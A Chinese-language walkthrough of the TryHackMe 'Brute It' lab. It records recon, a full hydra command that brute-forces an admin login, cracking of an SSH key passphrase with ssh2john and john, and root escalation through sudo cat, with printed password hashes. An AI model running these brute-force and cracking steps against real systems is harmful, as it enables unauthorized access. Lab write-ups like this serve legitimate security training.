Brute It -TryHackMe

一、信息收集

• 使用nmap对网站ip开放端口进行搜集

• 使用dirsearch发现网站下面有个admin目录访问看看

• 是一个管理员登录界面

• 在这个页面右键源代码发现了给我们的提示，告诉我们这个网站的账户是admin，我们抓包使用yakit进行爆破

二、枚举爆破

• 接下来使用hydra对网站的密码进行爆破

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.255.234 http-post-form "/admin/:user=^USER^&pass=^PASS^&Login=Login:Username or password invalid"

• 拿到了账户密码去登录看看

• 这里告诉我们john的私钥，已经很明显了先讲私钥保存到本地在使用ssh2john将私钥转化成哈希值在使用john进行爆破

• 这里成功爆破出密码 rockinroll 使用ssh对john进行登录

• 我这里遇到了报错这里直接修改私钥权限就好了chmod 600 id_rsa

Permissions 0664 for 'id_rsa' are too open.
This private key will be ignored.
Load key "id_rsa": bad permissions
当前私钥 id_rsa 权限为 0664（所有者可读写，组可读，其他用户可读）

SSH 要求私钥 只能自己读写，不能被组或其他用户访问

因此 SSH 忽略了私钥，并回退到密码登录提示

• 在当前目录发现了user.txt

三、提权

• 使用sudo -l 看看有什么命令是以root方式启动的

• 这里可以/bin/cat 命令可以root 权限启动 在这里我们尝试读取/etc/passwd下面的hash值然后保存在使用john进行爆破

$6$zdk0.jUm$Vya24cGzM1duJkwM5b17Q205xDJ47LOAg/OpZvJ1gKbLF8PJBdKJA4a6M.JYPUTAaWu4infDjI88U9yUXEVgL.
$6$iODd0YaH$BA2G28eil/ZUZAV5uNaiNPE0Pa6XHWUFp7uNTp2mooxwa4UzhfC0kjpzPimy1slPNm9r/9soRw8KqrSgfDPfI0

• 将root和john的hash保存为文件使用john爆破

john --wordlist=/usr/share/wordlists/rockyou.txt --format=sha512crypt password.txt  

• 这里使用john爆破只爆破出来一个密码，尝试登录了一下发现是root的密码

• 直接查看根目录的root.txt文件